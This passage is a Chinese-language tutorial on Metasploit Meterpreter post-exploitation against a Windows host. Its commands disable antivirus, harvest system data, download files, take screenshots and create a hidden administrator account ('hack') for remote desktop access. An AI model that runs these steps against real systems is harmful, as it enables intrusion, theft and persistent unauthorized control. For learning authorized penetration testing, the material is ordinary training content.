查看主機是否運行在虛擬機上

run post/windows/gather/checkvm

關閉殺毒軟件
拿到目標主機的shell后第一件事就是關閉掉目標主機的殺毒軟件，通過命令

run killav

獲取目標主機的詳細信息

run scraper

它將目標機器上的常見信息收集起來然后下載保存在本地

Meterpreter支持非常多的文件系統命令（基本跟Linux系統命令類似），一些常用命令如下：

pwd：當前所在位置 ls：獲取當前目錄下的文件 cd：切換目標目錄； cat：讀取文件內容； rm：刪除文件； edit：使用vim編輯文件 mkdir：新建目錄； rmdir：刪除目錄；所在位置

upload file 命令則能夠向目標系統上傳文件。

download file 命令可以幫助我們從目標系統中下載文件

屏幕截圖

screenshot

截圖目標主機屏幕，可以看到，圖片被保存到了/root 目錄下


查看目標主機有哪些用戶

run post/windows/gather/enum_logged_on_users

可以在目標系統中創建一個新的用戶賬號

run getgui -u hack -p qwe

這個命令會創建用戶，并把他添加到 Administrators 組中，這樣該用戶就擁有遠程桌面的權限了。這里成功創建了用戶，但是添加到Administrators組中失敗了 !
如果添加到Administrators組中失敗了的話，我們可以運行：shell,進行cmd窗口手動將該用戶添加到administrators組中。

查看系統用戶組

net localgroup

administrators即為系統管理員用戶組，只需要將添加的用戶加入到管理員用戶組即可。

將hack用戶添加到管理員用戶組。

net localgroup administrators hack /add

總結

以上是生活随笔為你收集整理的Metasploit--后渗透（一些基本操作方法）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。